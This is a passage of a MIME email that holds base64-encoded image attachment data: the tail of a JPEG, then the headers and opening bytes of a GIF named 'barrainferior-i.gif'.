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 ------=_NextPart_94915C5ABAF209EF376268C8 Content-Type: image/gif; name="barrainferior-i.gif" Content-Transfer-Encoding: base64 Content-Description: barrainferior-i.gif Content-Id: <147590-22002252219104897211@2> R0lGODlhhQEWAMQAAAAAAHBwcDMzM///AODg4K6urlNTU5mZmRAQEExMLGZmAMDAwICAgP///0BA QH19fSAgIJ6ePmJiQhkZGfDw8GZmZszMzB8fAIyMjEtLS5mZmScnJ/4BAgAAAAAAAAAAACH5BAUU ABwALAAAAACFARYAAAX/YCGOZGmeaKqubOu+cCzPdG3feK7v6+H/wKBwSCwaj8ikcslsOp/QqHRK rVqvx4d2y+16v+CweEwum8/otHrNbrvf8Lh8Pq7Y7/i8fs/nRwCAgBF9hIWGh4iJiouMjY6PkJGS 